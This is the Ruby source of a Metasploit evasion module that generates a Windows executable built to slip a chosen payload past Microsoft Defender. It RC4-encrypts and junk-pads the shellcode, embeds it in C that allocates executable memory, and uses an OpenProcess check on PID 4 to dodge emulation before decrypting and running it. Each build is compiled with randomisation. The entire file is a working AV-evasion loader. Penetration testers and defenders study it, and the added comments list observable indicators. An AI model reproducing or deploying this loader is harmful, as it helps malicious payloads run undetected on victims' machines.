GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/windows_defender_exe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/compiler/windows'
# Evasion module that emits a Windows x86 EXE carrying the selected payload
# RC4-encrypted inside a C source file, which is then compiled by
# Metasploit's randomising Windows compiler wrapper (see #run).
#
# The per-method comments below describe what the generated program
# actually does, so that its behaviour on a host can be reasoned about
# independently of the technique names given in the module description.
class MetasploitModule < Msf::Evasion

  # @param info [Hash] module metadata; merged over the defaults given here
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Microsoft Windows Defender Evasive Executable',
        'Description' => %q{
This module allows you to generate a Windows EXE that evades against Microsoft
Windows Defender. Multiple techniques such as shellcode encryption, source code
obfuscation, Metasm, and anti-emulation are used to achieve this.

For best results, please try to use payloads that use a more secure channel
such as HTTPS or RC4 in order to avoid the payload network traffic getting
caught by antivirus better.
},
        'Author' => [ 'sinn3r' ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Targets' => [ ['Microsoft Windows', {}] ]
      )
    )
  end

  # Per-instance RC4 key, generated once and memoised so that #get_payload
  # (which encrypts under it) and #c_template (which embeds it in the C
  # source) agree on the same value. Alphabetic only, so it can be placed
  # verbatim inside the C string literal in #c_template without escaping.
  #
  # @return [String] 32-64 random ASCII letters
  def rc4_key
    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)
  end

  # Builds, once, the encrypted payload blob that #c_template embeds.
  #
  # The selected payload's encoded bytes get 10-1024 random trailing bytes
  # appended before transformation, so both the ciphertext and its length
  # differ from run to run. The `lambda { ... }.call` wrapper is an
  # immediately invoked block whose only purpose is to let the `return`
  # inside produce the value that gets memoised in @get_payload.
  #
  # @return [Hash{Symbol => Object}]
  #   :size     - byte length of payload plus junk
  #   :c_format - that buffer passed through Msf::Simple::Buffer.transform
  #               in 'c' format as an array named `buf`, with the rc4/key
  #               options (the C side undoes this with RC4() and #rc4_key)
  def get_payload
    @get_payload ||= lambda {
      opts = { format: 'rc4', key: rc4_key }
      junk = Rex::Text.rand_text(10..1024)
      p = payload.encoded + junk

      return {
        size: p.length,
        c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)
      }
    }.call
  end

  # Memoised C source of the generated executable, with the encrypted
  # payload and the key interpolated. Everything between the %| delimiters,
  # including the `//` comments, is emitted into the compiled program.
  #
  # What the generated program does, in order:
  #   * declares `buf`, the transformed payload array from #get_payload;
  #   * VirtualAlloc()s sizeof(int) * size bytes (four times the payload
  #     length) with protection 0x40 (PAGE_EXECUTE_READWRITE) and zeroes it;
  #   * calls OpenProcess(0x1F0FFF /* PROCESS_ALL_ACCESS */, false, 4),
  #     i.e. requests full access to PID 4 (the System process);
  #   * only when that handle is NULL does it RC4-decrypt `buf` into the
  #     allocation using #rc4_key and transfer control to it through a
  #     function pointer.
  #
  # The author's comment marks the NULL check as the anti-emulation gate.
  # The code implies the call is expected to fail on a real host, while an
  # environment that lets it succeed never reaches the decrypt-and-execute
  # branch; the page does not state how any particular scanner behaves, so
  # treat that reading as an inference. From a monitoring standpoint the
  # observable behaviours are the RWX allocation, the OpenProcess() against
  # PID 4, and the indirect call into freshly allocated memory.
  #
  # @return [String] C source; #get_payload is interpolated before #rc4_key,
  #   and both are memoised, so repeated calls return identical text
  def c_template
    @c_template ||= %|#include <Windows.h>
#include <rc4.h>

// The encrypted code allows us to get around static scanning
#{get_payload[:c_format]}

int main() {
int lpBufSize = sizeof(int) * #{get_payload[:size]};
LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);
memset(lpBuf, '\\0', lpBufSize);

HANDLE proc = OpenProcess(0x1F0FFF, false, 4);
// Checking NULL allows us to get around Real-time protection
if (proc == NULL) {
RC4("#{rc4_key}", buf, (char*) lpBuf, #{get_payload[:size]});
void (*func)();
func = (void (*)()) lpBuf;
(void)(*func)();
}

return 0;
}|
  end

  # Module entry point: echoes the C source in verbose mode, compiles it
  # with the randomising Windows compiler and hands the resulting binary to
  # file_create. #c_template is memoised, so the printed and compiled
  # sources are the same text.
  #
  # @return [void]
  def run
    vprint_line c_template
    # The randomized code allows us to generate a unique EXE
    bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)
    print_status("Compiled executable size: #{bin.length}")
    file_create(bin)
  end

end